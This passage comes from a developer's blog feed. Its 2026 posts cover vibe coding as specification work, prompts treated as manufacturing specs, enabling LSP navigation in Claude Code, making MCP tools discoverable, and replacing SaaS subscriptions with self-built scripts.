Then no-code in the 2010s. Citizen developers. Visual workflows. Drag-and-drop databases. I watched three different companies I worked at try to use no-code platforms to “reduce dependency on engineering.” It reduced dependency on engineering the same way COBOL did: by creating a new class of technical specialists (now called “no-code developers” or “operations engineers”) who spent their days fighting with visual tools that couldn’t quite express what they needed to express.

Same experiment, sixty-five years, same result. Better interface, same bottleneck.

Here’s what I think is actually happening, and a comment on a Hacker News thread about agentic engineering said it more precisely than I can:

“When you get down to breaking down that problem... you become a programmer.”

The average person doesn’t know what their actual problems are in sufficient detail to get a working solution. Not because they’re not smart. Because the act of breaking a problem down into precisely specified steps that a computer can execute without ambiguity is programming, regardless of whether the syntax is COMPUTE TAX = PRICE * RATE or def calculate_tax(price, rate): return price * rate or “hey, write me something that calculates tax.”

The specification is the programming. The syntax is just notation.
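Even the one-line tax function hides a decision that none of the three notations states: how to round. Here is a minimal Python sketch, assuming prices are held as Decimal values and tax is rounded to whole cents. The rounding parameter is my addition for illustration, not part of any version above.

```python
from decimal import Decimal, ROUND_HALF_EVEN, ROUND_HALF_UP


def calculate_tax(price: Decimal, rate: Decimal, rounding: str) -> Decimal:
    """Tax on a price, rounded to whole cents with an explicit rule."""
    return (price * rate).quantize(Decimal("0.01"), rounding=rounding)


price = Decimal("0.50")
rate = Decimal("0.05")  # the raw tax is exactly 0.025

print(calculate_tax(price, rate, ROUND_HALF_UP))    # 0.03
print(calculate_tax(price, rate, ROUND_HALF_EVEN))  # 0.02
```

Same inputs, same formula, a one-cent difference. Whoever picks the rounding rule is doing the programming, in whatever notation they pick it.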

Vibe coding is genuinely different from COBOL in one important sense: the interface change is more dramatic. Natural language processed by a model that can write working TypeScript from a vague description is qualitatively new. The gap between “what you type” and “what runs” has never been smaller.

But the gap between “what you type” and “what you actually wanted” is exactly as large as it’s always been. Possibly larger, because the tool is so capable that it confidently fills in every unspecified detail, silently, in ways that seem reasonable until they’re not.

My rate limiter reset at UTC midnight because I didn’t say it shouldn’t. The agent wasn’t wrong. I was underspecified.

What vibe coding has genuinely changed: the syntax, the boilerplate, the standard implementations of standard patterns are now basically free. A solo developer with Claude Code can ship in a week what used to take a team a month. That’s real leverage and I use it every day.

What hasn’t changed: the irreducible core of the job — figuring out with enough precision what you want the computer to do — is still entirely human work. And based on sixty-five years of running this experiment, there’s a reasonable argument that it’s definitionally human work. When you get specific enough about a problem to get a working solution, you’ve already done the programmer’s job. You might be doing it in plain English now instead of Python. You’re still doing it.

The developer job is changing. Less time on syntax, more time on the thinking that was always the hard part. More time arguing with your tools about exactly what you meant. More time specifying the edge cases before the tool invents its own.

If you’ve ever wanted to spend less time fighting TypeScript compiler errors and more time actually thinking about what you’re building — genuinely, that part is better now.

But the thinking is still yours.

The programmers are still here. They’ve been here since 1959. They’ll be here after vibe coding. They just keep getting better tools.

Learn from the evidence. It’s sixty-five years old and it’s not subtle.

What Chinese Factories Taught Me About Prompting Claude Code

Lakshmi Narasimhan — Tue, 03 Mar 2026 15:32:21 GMT

A few weeks ago, I fell down a Hacker News rabbit hole at 11pm. Someone had posted a manufacturing post-mortem — one of those beautiful, painful essays where a hardware founder documents exactly how badly they got burned.

This founder had designed a custom lamp. Spent months prototyping. Found a factory in Shenzhen. Shipped 500 units.

When the boxes arrived, the light-entry holes had been used as casting pour-points — the factory needed somewhere to pour the material, saw the holes, and went with it. The cable tails were two centimeters instead of ten. The knobs didn’t fit because the powder coating added thickness that nobody put in the spec. Everything technically matched the purchase order. Nothing actually worked.

I read that post-mortem three times. Then I read the top comment, which was one of those sentences that you immediately screenshot because it’s just too true:

“Anything you don’t specify will be done at minimum cost.”

I put my phone down. I looked at the ceiling. And then I thought about the email sender I’d had Claude Code generate that afternoon.

Let me tell you what I had asked for: “Send a welcome email to new users when they sign up.”

Let me tell you what I got: A function that sent emails. Technically correct. It looped over every new user and called the email API synchronously, one by one, waiting for each response before moving to the next. No rate limiting. No retry logic. No unsubscribe link — because I didn’t ask for one, and CAN-SPAM compliance wasn’t in the prompt. When I ran it against a list of 8,000 users, it fired all 8,000 requests in a tight loop, Gmail flagged the sending domain as a spam source within six hours, and my domain was blacklisted before I’d finished my coffee.

Everything sent. Nothing arrived.

I had been vibe coding with Claude Code for six months at that point, and I thought I was pretty good at it. I could get it to build things fast. I could chain prompts together. I had CLAUDE.md files and hooks and all the trappings of someone who knew what they were doing.

What I didn’t understand — what the Hacker News post-mortem forced me to understand — is that I had completely misidentified what kind of relationship I was in.

I thought I was pair programming with a senior engineer.

I was issuing purchase orders to a factory.

This distinction sounds philosophical. It isn’t. It has concrete, expensive implications for every vibe coding prompt you write.

A senior engineer fills gaps with judgment. If you say “build auth,” a good senior engineer asks: what are the scale requirements? What’s the threat model? Are we storing PII? They fill the spec gaps with professional standards because they have skin in the game — it’s their name on the code, their reputation on the line, their on-call rotation if it breaks at 3am.

A factory fills gaps with cost optimization. If the spec doesn’t say “cable tails must be 10cm,” the factory cuts them at 2cm. Not because they’re malicious. Because that’s 8cm of wire per unit times 500 units and someone’s margin depends on it. They’re perfectly rational. They’re just optimizing for something that has nothing to do with whether your lamp works.

Claude optimizes for “satisfies the prompt.” That’s the whole job. Your vague prompt is its permission to take shortcuts, and it will take them — not maliciously, but with the same rational efficiency as a factory floor supervisor who notices you didn’t specify the minimum acceptable wire gauge.

Here’s the thing about the hardware community that I find both humbling and enraging: they figured this out decades ago. They built an entire profession around it. These people are called sourcing agents, and their whole job is translating “I want a nice lamp” into a 47-page document covering material density, wire gauge, coating thickness, packaging dimensions, UV stability ratings, and what happens to the tooling if the order falls below minimum quantity.

Forty-seven pages. For a lamp.

In vibe coding, the sourcing agent is you. Most developers have been accidentally promoted to this role without realizing it. They’re still acting like they’re talking to a colleague. They’re actually running a factory and they’re skipping the quality control, the detailed specs, and the first-article inspection — all the boring stuff that hardware people do automatically because they’ve shipped enough garbage to know better.

I’ve started reading Hacker News manufacturing posts specifically to steal their frameworks for this. A few things that have genuinely changed how I write prompts:

Spec your constraints, not just your features. “Send welcome emails” is a feature request. “Send welcome emails via SES, rate-limited to 14 per second to stay under AWS sending limits, with exponential backoff and a max of 3 retries on failure, an unsubscribe link in the footer per CAN-SPAM, a plain-text fallback alongside the HTML version, and a hard skip for any address that has previously bounced or complained” is a spec. The difference isn’t intelligence — it’s the same way specifying wire gauge isn’t about distrusting your factory. It’s about understanding that factories don’t have opinions about wire gauge. They have margins.

Inspect the first batch before commissioning the full run. Hardware founders don’t ship the first production run to customers. They order samples. They measure every dimension with calipers. The good ones fly to Shenzhen and stand on the factory floor. The developer equivalent is reading the first 200 lines of generated code before asking Claude to build the next feature on top of it. Check the database schema before building the API on top of it. Read the auth flow before adding the permissions layer. This feels slow. It is much faster than discovering that the foundation is wrong after you’ve built four floors.

Specify what you don’t want. This one surprised me. Experienced sourcing agents reportedly spend half their spec document on exclusions. “No recycled plastic in structural components.” “No substituted components without written approval.” “No unlicensed firmware.” They’ve learned that a factory will always find the interpretation of the spec that costs them the least, so you have to close the doors. For prompts: “No inline styles. No TypeScript any types. No console.log for error handling. No SELECT * queries. No external dependencies unless they’re in the approved list.” The AI will not volunteer that it’s about to do these things. It will do them and move on.

Budget time for the spec, not just the build. Hardware founders allocate somewhere between 30 and 40% of their project timeline to specification work. The manufacturing part, the actual production, is the smaller slice. Vibe coders typically invert this. Five percent on the prompt, ninety-five percent on generating code and then debugging the surprising things that came out of a vague prompt. The debugging is expensive. The spec is cheap.
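To make the welcome-email spec above concrete, here is a rough Python sketch of its delivery constraints: pacing, retries with exponential backoff, and the hard skip for suppressed addresses. It is not the code from that afternoon. The send callable is a hypothetical stand-in for the real email API, the one-second base delay is my assumption (the spec only says "exponential backoff"), and the unsubscribe link and plain-text fallback are message content that this sketch leaves out.

```python
import time
from typing import Callable, Iterable, List, Set

MAX_PER_SECOND = 14         # from the spec in the text
MAX_RETRIES = 3             # retries after the first attempt
BASE_BACKOFF_SECONDS = 1.0  # assumption: the spec gives no base delay


def send_welcome_emails(
    addresses: Iterable[str],
    suppressed: Set[str],
    send: Callable[[str], None],
    sleep: Callable[[float], None] = time.sleep,
) -> List[str]:
    """Send to each address; return the addresses that never succeeded.

    `send` is a hypothetical stand-in for the email API call and is
    expected to raise an exception on failure.
    """
    failed = []
    for address in addresses:
        if address in suppressed:
            continue  # hard skip: previously bounced or complained
        for attempt in range(MAX_RETRIES + 1):
            try:
                send(address)
                break
            except Exception:
                if attempt == MAX_RETRIES:
                    failed.append(address)
                else:
                    # Exponential backoff: 1s, 2s, 4s
                    sleep(BASE_BACKOFF_SECONDS * 2 ** attempt)
        # Crude pacing: every send attempt is followed by a pause,
        # so there are never more than 14 attempts per second.
        sleep(1.0 / MAX_PER_SECOND)
    return failed
```

Passing sleep in as a parameter is a design choice for testability: a test can record the delays instead of waiting for them. A real sender would also want to distinguish retryable failures from permanent ones, which this sketch does not attempt.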

The thing I keep coming back to is that using Chinese manufacturers is incredible leverage. You can build a physical product without owning a factory, without specialized tooling knowledge, without decades of manufacturing experience. It’s genuinely one of the great unlocks of the modern economy. And it works — when you write the spec correctly.

Using Claude to write code is the same kind of leverage. You can build things without knowing every library, without remembering every API, without holding the entire codebase in your head at once. It works. When you treat it like what it is.

Your prompt is a manufacturing spec. The code is the factory output. The factory will be rational, efficient, and completely indifferent to whether your product actually works.

Write the spec accordingly.

Or enjoy your two-centimeter cable tails.

Claude Code Has Been Navigating Your Codebase Like a Tourist With No Map

Lakshmi Narasimhan — Mon, 02 Mar 2026 13:31:31 GMT

Here’s a thing that happened to me.

I was watching a Claude Code session — one of those where you hand the agent a task and then sit back to observe, feeling very enlightened and modern. The task was simple: find where user authentication was implemented and add a new field to the login flow.

The agent started grepping. authenticate. Then auth. Then login. Then loginUser. Then handleLogin. Each grep taking 3-8 seconds, scanning hundreds of files, returning walls of output full of comments, test fixtures, variable names that happened to contain the word “auth”, README lines I’d written two years ago and forgotten.

Six minutes in, the agent had read approximately 40% of my codebase and was confidently editing... a test helper that mocked authentication. Not the actual implementation. A mock. In a test file.

I watched it do this — a system with the reasoning capacity of a senior engineer, burning through context and API calls to do something that VS Code does when I hold Ctrl and click a function name. Something VS Code has done since 2016. Something that takes 50 milliseconds.

This is the state of the art in 2026. The most capable AI coding tool available, navigating your codebase the way your grandfather would navigate a foreign city: slowly, incorrectly, and with a lot of asking for directions from people who don’t know either.

There’s a fix. There are actually two fixes, and you need both. But first I want to explain why the problem is worse than it looks, because if you don’t understand the root cause, you’ll implement half of the solution and wonder why your agents still feel like babysitting.

Let me tell you about grep, and why it’s a disaster for code navigation specifically.

Grep is a text search tool. It finds patterns in text. This is genuinely useful for a lot of things. When you want to find every config file that mentions a database host, grep is perfect. When you want to find a log line, grep is perfect. When you want to navigate code semantically — find where a function is defined, trace what calls a function, understand the type hierarchy — grep is completely wrong for the job. It just happens to be the only hammer available, so everything looks like a nail.

Here’s the specific failure mode. When your agent searches for authenticate, it finds:

auth.service.ts:47:  async authenticate(user: User): Promise {
auth.service.ts:112: // authenticate is called after 2FA verification
auth.middleware.ts:23: // Middleware that calls authenticate() before protected routes
auth.test.ts:8:   describe('authenticate', () => {
utils/mock-auth.ts:31:   authenticate: jest.fn().mockResolvedValue(mockToken),
config/dev.ts:15:   authenticateWithMock: true,
README.md:234: ## How to authenticate

Seven results. One is the actual definition. The agent has to read all of them, reason about which one is the real thing, and then probably read the files surrounding each one to build context. Meanwhile, it’s consuming tokens, spending time, and building a picture of your codebase that’s assembled from grep outputs rather than from actual structural understanding.

The deeper problem: grep doesn’t understand the difference between a definition, a call site, a comment, a test mock, and a config flag. Those are fundamentally different things in the semantic structure of a codebase. A human engineer with IDE tooling can instantly distinguish them. An agent with only grep cannot — it has to infer the difference from text patterns and context, which it does imperfectly, which means it makes wrong edits, which you have to catch and correct, which is why agent sessions still require babysitting.

This is not a clever problem. We solved it for humans a long time ago.

In 2016, Microsoft did something quietly brilliant. They were building VS Code, and they had a problem: every editor had to implement language intelligence from scratch. Vim plugins, Emacs modes, IntelliJ — everyone was reimplementing the same understanding of what a TypeScript file meant, independently, badly, in incompatible ways.

Their solution was the Language Server Protocol. The idea: separate the “smarts” from the editor. Create a standard protocol where a language server — a standalone process that deeply understands a specific language — can talk to any editor that speaks the protocol. Build the language server once, correctly, and every editor gets the benefit.

A language server is not a text search tool. It parses your code into an Abstract Syntax Tree. It resolves types. It builds a symbol table — a complete map of every identifier in your codebase: what it is, where it’s defined, what it references, what references it. When VS Code shows you that authenticate is defined in auth.service.ts on line 47, it’s not searching for the string “authenticate.” It’s looking up authenticate in the symbol table and getting back a precise answer in under 50 milliseconds.
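To see the difference in miniature, here is a toy symbol table built with Python's standard ast module. It is only a stand-in for what a real language server does at far larger scale: it handles one file, tracks only plain function definitions and direct calls by name, and resolves no types. The source snippet and the build_symbol_table helper are invented for the example.

```python
import ast
from collections import defaultdict

SOURCE = '''
def authenticate(user):
    return "token-for-" + user

def login(user):
    return authenticate(user)

def refresh(user):
    # authenticate again after expiry
    return authenticate(user)
'''


def build_symbol_table(source):
    """Map each function name to its definition line and its call-site lines."""
    table = defaultdict(lambda: {"defined_at": None, "referenced_at": []})
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.FunctionDef):
            table[node.name]["defined_at"] = node.lineno
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            table[node.func.id]["referenced_at"].append(node.lineno)
    for entry in table.values():
        entry["referenced_at"].sort()
    return dict(table)


table = build_symbol_table(SOURCE)
print(table["authenticate"])
# {'defined_at': 2, 'referenced_at': [6, 10]}
```

The comment on line 9 mentions authenticate and never shows up in the table, because the parser knows it is a comment. A text search would have returned it as a hit.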

LSP was so obviously right that it became universal. Every serious editor implemented it. Every major language has a language server: pyright for Python, gopls for Go, typescript-language-server for TypeScript, rust-analyzer for Rust, clangd for C/C++. You almost certainly have at least one of these running on your machine right now.

The irony is that we gave AI agents trillion-parameter language models with remarkable reasoning capabilities, and then handed them grep for code navigation. Like building a Formula 1 car and fitting it with bicycle tires.

Claude Code can connect to these language servers. As of early 2026, this is an undocumented community workaround discovered via a GitHub issue — not an official feature. Which is funny, given how much it changes things. Enable it by adding to ~/.claude/settings.json:

{
  "env": {
    "ENABLE_LSP_TOOL": "1"
  }
}

Or export it in your shell profile if you prefer:

export ENABLE_LSP_TOOL=1

Then install the language server plugin for your stack. Claude Code has a plugin system for this — update the marketplace first, then install:

claude plugin marketplace update claude-plugins-official

# TypeScript/JavaScript
claude plugin install typescript-lsp
npm install -g typescript-language-server typescript

# Python
claude plugin install pyright-lsp
npm install -g pyright

# Go
claude plugin install gopls-lsp
go install golang.org/x/tools/gopls@latest

# Rust
claude plugin install rust-analyzer-lsp
rustup component add rust-analyzer

One gotcha that will silently waste your time: a plugin can be installed but disabled. An installed, disabled plugin does nothing: no LSP server registers at startup, no tools become available, no error. Just grep, same as before. After installing, run claude plugin list and confirm the status reads enabled. If it shows disabled, run claude plugin enable followed by the plugin’s name. Check this before you spend 20 minutes wondering why nothing changed.

Once enabled, your agent gets access to tools that most people don’t know exist:

goToDefinition — exact location of any symbol’s definition. Not “files that contain this string.” The definition. In ~50ms.

findReferences — every call site in your entire codebase. Every single one, sorted, precise, with file and line number.

workspaceSymbol — search your codebase by symbol name. Returns only actual code symbols (functions, classes, interfaces, variables), not comments, not strings, not README lines.

hover — full type information for any identifier. When the agent is about to call a function, it can check the exact signature first rather than guessing.

diagnostics — real-time type errors. When the agent changes a function signature, the language server immediately reports every caller that’s now broken. In the same turn. Before the broken code ever runs.

That last one changes the loop entirely. Without LSP, the workflow is: agent makes a change → change breaks something → you run tests → tests fail → agent fixes it → might break something else → iterate. You’re discovering errors through tests, which means you’re discovering them late, which means multiple turns of cleanup for each mistake.

With LSP, the workflow is: agent makes a change → diagnostics immediately flag every type error caused by that change → agent fixes everything in the same turn. Error discovery goes from “whenever you run tests” to “immediately.” This alone is worth the two minutes it takes to set up.
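A toy version of that feedback loop, again using Python's ast module rather than a real language server: after a signature change, list every call that no longer matches. This sketch only compares positional-argument counts and ignores defaults, keyword arguments, and methods, so treat it as an illustration of the idea and not of how any language server computes diagnostics. The arity_diagnostics helper is hypothetical.

```python
import ast

# authenticate() has just gained a second parameter, otp_code.
SOURCE = '''
def authenticate(user, otp_code):
    return "token-for-" + user

def login(user):
    return authenticate(user)

def login_with_otp(user, code):
    return authenticate(user, code)
'''


def arity_diagnostics(source):
    """Report calls whose positional-argument count differs from the definition."""
    tree = ast.parse(source)
    expected = {
        node.name: len(node.args.args)
        for node in ast.walk(tree)
        if isinstance(node, ast.FunctionDef)
    }
    problems = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            name = node.func.id
            if name in expected and len(node.args) != expected[name]:
                problems.append(
                    f"line {node.lineno}: {name}() takes {expected[name]} "
                    f"arguments, got {len(node.args)}"
                )
    return sorted(problems)


for problem in arity_diagnostics(SOURCE):
    print(problem)
# line 6: authenticate() takes 2 arguments, got 1
```

The broken caller in login is reported without running a single test, which is the whole shift: the error surfaces at edit time instead of at test time.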

Here’s the catch, and it’s not obvious until you run into it.

Even with LSP enabled and plugins installed and confirmed active, Claude still prefers grep. Grep is familiar, grep is in its training distribution, grep is what it reaches for first. Having the tools available doesn’t automatically mean Claude will use them.

Add this to your CLAUDE.md:

## Code Navigation

Prefer LSP tools over Grep for any code navigation task:
- Use workspaceSymbol to find symbols by name
- Use goToDefinition to find where something is defined
- Use findReferences to find all call sites
- Use diagnostics after any edit to catch type errors immediately

Use Grep only for text search: log messages, comments, config values,
string literals. Never use Grep to find function definitions.

Explicit instructions in CLAUDE.md override default behavior. This is a documented pattern: the tools exist, but you have to tell the agent to use them. Think of it as configuring the agent’s preferences, not patching the agent’s capabilities.

Now here’s the part where most people stop, and where they shouldn’t.

LSP gives your agent GPS. It knows how to navigate. findReferences from anywhere in the codebase will return exact results. But GPS without a destination is just a compass. Your agent still has to figure out where to go before it can navigate there efficiently.

Think about how an experienced engineer ramps up on a new codebase. They don’t start by grepping for things. They start by asking questions: where does the auth layer live? What’s the database access pattern? How do the services communicate? They build a mental model first, then navigate with precision.

Your agent has no mental model of your codebase unless you give it one. Every session starts cold. It has the code itself (too much to read exhaustively) and the tools to navigate it (useful once oriented) but no map. So it wanders.

The second layer is a structured description of your codebase’s architecture. Not documentation. Not a README. A map for the agent — written in terms of what the agent needs to know to get oriented quickly:

## Codebase Architecture

**Entry point:** src/server.ts bootstraps the app. All route registration happens here.

**Auth layer:** Everything authentication-related lives in /src/auth.
The entry point is `authenticate()` in auth.service.ts.
JWT handling is in auth.middleware.ts. Session storage is Redis via auth.session.ts.
Never bypass the middleware — it handles rate limiting and audit logging.

**Services:** Business logic in /src/services.
PaymentService, UserService, NotificationService are the big three.
Services never call each other directly — all cross-service communication
routes through the event bus in /src/events/index.ts.

**Database:** Prisma ORM. Never write raw SQL — always go through the Prisma client.
Schema lives in /prisma/schema.prisma. Run `npm run db:migrate` after schema changes.

**External integrations:** Stripe in /src/integrations/stripe,
SendGrid in /src/integrations/email. Each integration has a fake for testing.

You put this in CLAUDE.md, or in a dedicated ARCHITECTURE.md that CLAUDE.md imports via @ARCHITECTURE.md.

What changes: your agent starts the session oriented. When you ask it to add a new payment method, it already knows that payment logic lives in /src/services/PaymentService, that external Stripe calls go through /src/integrations/stripe, and that services communicate through the event bus. It doesn’t need to explore your codebase to discover the architecture. It can go directly to the right place and navigate from there with LSP precision.

The GPS analogy only goes so far. A better way to think about it: LSP is your agent’s ability to look something up instantly. Semantic context is the agent knowing what to look up. Both are required. Without the map, LSP is a fast tool pointed in random directions. Without LSP, the map tells you where to go but getting there is still six minutes of grepping.

Together, your agent works the way a senior engineer works on a codebase they know well: they know the territory, they navigate precisely, and they catch their own mistakes before committing them.

The reason I keep coming back to this: the numbers suggest agents are about to do a lot more real work.

Michael Truell announced recently that Cursor now has 2x more agent users than Tab (autocomplete) users. Agent usage is up 15x in a year. More than a third of PRs merged at Cursor are created by agents running autonomously in the cloud — not a human in the loop, not autocomplete suggestions, agents doing complete pieces of work end-to-end.

If that’s the direction — and the trajectory makes it pretty clear it is — then agents navigating codebases with grep is a bottleneck at the wrong layer. You’ve solved the intelligence problem. You have an agent that can reason about complex changes across multiple files. You have not solved the navigation problem, which means the intelligence is being spent on finding things instead of changing them. It’s like hiring a brilliant architect and making them do their own filing.

LSP and semantic context are table stakes for agent-native codebases. The fact that LSP is buried in settings and semantic maps are a community pattern rather than a first-class feature is a product gap. It’ll get closed. But right now you have to close it yourself, and it takes about thirty minutes.

Set up the language server for your stack. Enable LSP in settings.json. Tell Claude to prefer it in CLAUDE.md. Write an architecture section that orients the agent in the first turn. Thirty minutes of setup for sessions that actually feel autonomous.

Your future self will be insufferably smug about having done this early. That’s a reasonable outcome.

Why Your MCP Server Will Die in Obscurity

Lakshmi Narasimhan — Thu, 26 Feb 2026 16:13:41 GMT

You built it over a weekend. The code works. Claude can technically call your tools. You added it to the config — if you’re not sure how, Stop Making Claude Code Guess covers the setup — restarted Claude Code, and — nothing. Claude doesn’t use it. Or uses it once, awkwardly, and then forgets it exists.

The problem isn’t your code. The problem is that Claude doesn’t know when to call your tools, so it doesn’t.

This is the thing nobody tells you when you’re learning MCP: the hardest part isn’t building the server. It’s making Claude reach for it.

How Claude Actually Chooses Your Tool

When you ask Claude to do something, it’s doing a matching problem. It looks at what you asked, scans the tools available to it, reads their descriptions, and decides which one — if any — fits.

That last part is the lever most developers ignore. Claude doesn’t run your code to figure out what your tool does. It reads the description you wrote and makes a judgment call. If your description is vague, generic, or poorly matched to the language your users actually use, Claude will skip your tool and try something else. Or just tell you it can’t do the thing.

Here’s a real example. Compare these two tool descriptions for the same function:

Bad: “Query the database.”
Good: “Look up a customer’s order history, subscription status, and recent activity by email address or customer ID. Use this when someone asks about a specific customer’s account.”

The first one is technically accurate. The second one is what Claude can actually match against. “What’s going on with john@example.com’s account?” maps cleanly to the second description. It maps to nothing in the first.

Your tool description is a search index. Write it like one.
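Here is roughly where that description lives. MCP tools are declared with a name, a description, and a JSON Schema for their input. The sketch below writes one out as a plain Python dict. The tool name and the identifier parameter are hypothetical; only the description text comes from the comparison above.

```python
import json

GOOD_DESCRIPTION = (
    "Look up a customer's order history, subscription status, and recent "
    "activity by email address or customer ID. Use this when someone asks "
    "about a specific customer's account."
)

# Hypothetical tool definition: a name, a description, and a JSON Schema
# describing the input the tool accepts.
lookup_customer_tool = {
    "name": "lookup_customer",  # invented name
    "description": GOOD_DESCRIPTION,
    "inputSchema": {
        "type": "object",
        "properties": {
            "identifier": {
                "type": "string",
                "description": "Customer email address or customer ID.",
            }
        },
        "required": ["identifier"],
    },
}

print(json.dumps(lookup_customer_tool, indent=2))
```

Note that the parameter gets its own description too. It is one more place to use the words your users actually use.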

The Five Ways MCP Servers Die

1. Bad descriptions. Already covered, but it bears repeating because it’s the most common failure. Every tool, resource, and prompt deserves a description that answers: when should Claude reach for this? Include the kinds of questions or requests that should trigger it. Use the words your users actually use.

2. Too many tools. There’s a temptation to expose everything. Every database table. Every API endpoint. Every configuration option. Resist it. A server with 30 tools is a server Claude gets confused by, and one that quietly eats your context window before you’ve typed a word. Claude can’t reliably choose the right tool when there are 30 candidates with overlapping descriptions. The best MCP servers do one thing, maybe two, exceptionally well. If you find yourself adding a tenth tool, ask whether you’re building a server or a dumping ground.

3. Output Claude can’t reason about. Tools that return raw JSON blobs, HTML, or binary data are tools Claude struggles to use. Claude works in text. If your tool returns {"data": [{"id": 1, "val": "foo"}, ...]}, Claude has to parse that before it can think about it. If your tool returns “Found 3 orders: Order #1001 (shipped Jan 15), Order #1002 (pending), Order #1003 (refunded)”, Claude can work with that directly. Format your output for a reader, not a parser.

4. Uninstallable. Most MCP servers have no README. No install instructions. No example config. No explanation of what environment variables they need. Even if someone finds your server on GitHub, if they can’t get it running in ten minutes, they close the tab. You will never hear from them again. Distribution is half the product.

5. Solving a problem only you have. This one is uncomfortable because it’s often true. The research tool you built for your specific workflow, against your specific internal data structure, with your specific edge cases handled — it’s not a product, it’s a script. That’s fine. But don’t confuse it for something others will install. The MCP servers that spread are the ones that solve problems many developers have, in a way that requires no customization to be useful out of the box.
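For failure mode 3, the fix is usually a few lines at the edge of the tool. A minimal Python sketch, assuming order records arrive as dicts with id and status keys (a hypothetical shape, not one from any particular API):

```python
from typing import Dict, List


def format_orders(orders: List[Dict[str, str]]) -> str:
    """Turn order records into one line of text a model can read directly."""
    if not orders:
        return "Found 0 orders."
    parts = [f"Order #{o['id']} ({o['status']})" for o in orders]
    noun = "order" if len(orders) == 1 else "orders"
    return f"Found {len(orders)} {noun}: " + ", ".join(parts)


orders = [
    {"id": "1001", "status": "shipped Jan 15"},
    {"id": "1002", "status": "pending"},
    {"id": "1003", "status": "refunded"},
]
print(format_orders(orders))
# Found 3 orders: Order #1001 (shipped Jan 15), Order #1002 (pending), Order #1003 (refunded)
```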

What Actually Works

The servers that get used share a few traits.

They have narrow scope with deep utility. Not “do 20 things mediocrely” but “do one thing so well you’d miss it if it was gone.” A good example: a server that searches Hacker News. One tool, one job — search HN, return results with scores and comment counts, formatted so Claude can reason about it immediately. That’s enough. That’s a server people actually keep installed.

They treat descriptions as product copy. Not documentation — copy. The description is the first thing Claude reads and the primary factor in whether your tool gets called. Write it for Claude the way you’d write an app store listing: what does this do, when do you need it, what does success look like.

They fail gracefully and informatively. When something goes wrong, a good tool returns “No results found for ‘X’. Try a broader search term.” A bad tool raises an exception. Claude can work with the first one. It can only apologize for the second.

They’re easy to install. One command. One config block. Clear documentation for what environment variables are needed and what they do. If setup takes more than five minutes, most people won’t finish.
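A rough Python sketch of two of these traits together: a description written as copy, and a failure path that returns guidance instead of raising. To keep it self-contained, the stories are passed in as a plain list rather than fetched from Hacker News, so search_stories and the sample data are hypothetical, and wiring the function into an actual MCP server is left out.

```python
def search_stories(query: str, stories: list[dict]) -> str:
    """Search Hacker News stories by keyword.

    Use this when the user asks what Hacker News is saying about a topic.
    Returns matching titles with scores and comment counts, or a plain-text
    hint when nothing matches.
    """
    query = query.strip()
    if not query:
        # Bad input gets an instruction, not a stack trace.
        return "No search term given. Try a keyword such as 'kubernetes'."

    matches = [s for s in stories if query.lower() in s["title"].lower()]
    if not matches:
        return f"No results found for '{query}'. Try a broader search term."

    lines = [f"Found {len(matches)} result(s) for '{query}':"]
    for s in matches:
        lines.append(f"- {s['title']} ({s['points']} points, {s['comments']} comments)")
    return "\n".join(lines)


# Made-up sample data standing in for a real search backend.
sample = [
    {"title": "Show HN: A tiny MCP server", "points": 212, "comments": 87},
    {"title": "Why we left Kubernetes", "points": 540, "comments": 301},
]
print(search_stories("mcp", sample))
print(search_stories("haskell", sample))
```

Every branch returns text Claude can act on. The empty-result message tells it what to try next, which is the difference between a retry and an apology.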

The Gap This Creates

Right now, MCP is early. Most servers are weekend experiments. The production-quality servers — narrow scope, excellent descriptions, graceful error handling, easy installation — are rare.

That gap is an opportunity. A well-built MCP server that solves a real developer problem and is easy to install can spread through Claude Code users the same way good VS Code extensions did: by word of mouth, by being genuinely useful, by being the thing you’d mention in a conversation when someone complains about the problem you solved.

The window isn’t permanent. In six months, there will be a lot more competition. Right now, the bar is low enough that “works reliably and has a clear description” puts you in the top 10%.

That’s what I’m writing about in the MCP Cookbook, a practical guide to building production MCP servers for Claude Code: real code, real patterns, real mistakes. Not how to write an MCP server; the official docs cover that. How to write one that people actually use.

Subscribers get early access when it’s ready. You’re already on the list.

While You Panic About AI Taking Jobs, I Built $200/Mo Tools

Lakshmi Narasimhan — Wed, 18 Feb 2026 06:09:29 GMT

I was about to click “Subscribe: $29/month” on yet another AI content tool when I stopped.

Not because $29 was a lot. I’ve subscribed to worse. I have a graveyard of forgotten SaaS products auto-renewing somewhere in my credit card statement, silently draining money for tools I used exactly twice.

No, I stopped because I realized something embarrassing.

This tool was literally just a pretty wrapper around Claude. Same AI I already pay for. Same capabilities. They’d added a nice UI, a payment form, and approximately zero additional value.

I was about to pay $29/month to rent something I could build in an afternoon.

So I closed the tab. Opened Claude Code. And two hours later, I had my own version. No usage limits. No subscription. Mine forever.

That was six months ago. Since then, I’ve built six tools. I’ve eliminated $200/month in subscriptions. And I’ve realized something that changed how I think about this whole “AI is coming for your job” panic.

Hey, I’m Lakshmi: I help developers build, deploy, and distribute their SaaS without hiring a team. I also run Stacksweller and Supabyoi.

New here? Start with Why Your AI Wakes Up Every Morning With No Memory or Clean Code Is Dead.

Everyone’s Worried About the Wrong Thing

My LinkedIn feed is a horror show right now. Every other post is either “AI will take your job” or “Here’s how to survive the AI apocalypse” or some variation of “the robots are coming, repent.”

The advice is always the same. Learn to prompt. Adapt or die. Get your finances in order because disruption is coming.

Maybe it is. I don’t know the future any better than you do.

But here’s what I do know: while everyone’s stockpiling survival advice, I’ve been using those same AI tools to eliminate $200/month in software subscriptions. Tools I was paying for six months ago? I own them now. Forever. Zero recurring cost.

Same technology. Completely different mindset.

Let me show you what I mean.

The Batch PDF Processor I Built Instead of Uploading 50 Files

I had 50 research papers to process. Extract abstracts, pull out key findings, grab any data tables, save everything as searchable markdown.

Sure, Claude can read a PDF. One at a time. Upload, wait, copy the output, upload the next one, repeat 49 more times.

Old me would’ve done exactly that. Or Googled “batch PDF extraction tool,” found something that charges per page, done the math, decided it wasn’t worth it, and then manually uploaded 50 files anyway.

New me? I built a script.

Ninety minutes later, I had a skill that loops through a folder, extracts text and tables from each PDF using PyMuPDF, summarizes each one, and saves structured markdown files. Point it at a folder, go make coffee, come back to 50 organized summaries.

> Process all PDFs in ~/research/papers
[loops through 50 files]
[extracts + summarizes each]
[saves to ~/research/summaries/]

No uploading files one by one. No copy-paste marathon. No usage limits. Runs locally, so nothing leaves my machine.

